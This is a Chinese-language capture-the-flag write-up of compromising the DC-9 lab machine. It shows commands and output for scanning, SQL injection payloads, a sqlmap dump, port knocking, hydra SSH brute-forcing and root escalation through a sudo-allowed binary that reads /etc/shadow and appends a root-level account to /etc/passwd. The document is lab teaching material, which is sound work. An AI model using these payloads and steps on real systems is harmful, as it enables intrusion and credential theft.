首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135。
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
Currently scanning: 192.168.244.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.244.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.244.2 00:50:56:f7:b2:38 1 60 VMware, Inc.
192.168.244.135 00:0c:29:e4:f7:0d 1 60 VMware, Inc.
192.168.244.254 00:50:56:ed:d6:50 1 60 VMware, Inc.
随后使用Nmap对靶机进行扫描,发现22端口被过滤,80端口开启。
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
尝试访问Web服务。
在Search部分测试SQL注入。
使用order by猜测列数,得出返回6列数据。
通过union select获得列数。
获取数据库名和当前数据库版本。
获得当前数据库中存在的表名。
Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#
查看表的字段名。
Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#
获得用户名和密码Hash后,对Hash进行破解,然后在Web界面登录。
用户名密码为:admin:transorbital1
通过Manage界面的File does not exist,我们猜测文件包含漏洞。通过BurpSuite进行爆破尝试。
这里需要注意,发送请求时不能URL编码Payload。
接下来的我们获得了用户名,但是SSH端口并没有开启,在/etc下我们发现了/etc/knockd.conf,Knockd保护了SSH端口的开启与关闭,根据Knockd的配置,我们只有按顺序访问指定端口,才能开启SSH端口。
根据配置文件我们可知,按顺序访问7469,8475,9842端口可以打开SSH端口。我们可以用nc或nmap来Knock。
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
我们现在已经开了SSH端口,但我们没有SSH的用户名与密码,我们尝试sqlmap,将数据库的内容导出,尝试爆破SSH用户和密码。我们首先将注入点的HTTP请求内容保存至文件。
POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
search=%27or+1%3D1%23
然后使用如下命令导出表中内容。
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump
······
[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'
随即处理文件内容然后进行爆破。
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.244.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.244.135 login: janitor password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08
获得密码后,我们尝试登录提权。三个账户都没有sudo权限,但janitor用户目录下有隐藏文件。
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Mar 5 21:57 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Mar 5 21:57 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
我们使用这些密码再次进行爆破。
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.244.135 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27
查看sudo -l权限。
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
进入到该可执行文件的上层目录查看test.py的源码。
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
通过分析源码,我们知道该程序接收三个参数,读取第二个参数并写入第三个参数,那么我们就可以构造一个拥有root权限的用户写入/etc/passwd文件中,从而提权。我们首先通过程序读取shadow文件的内容,获得一个我们已知密码的用户。
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::
我们修改这条内容为如下内容。并保存在/tmp/test下。
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash
然后通过test程序进行写入(请使用单引号),并su提权(这里要提交janitor的密码)。
fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd
fredf@dc-9:/opt/devstuff$ su hacker
提权后成功获得FLAG。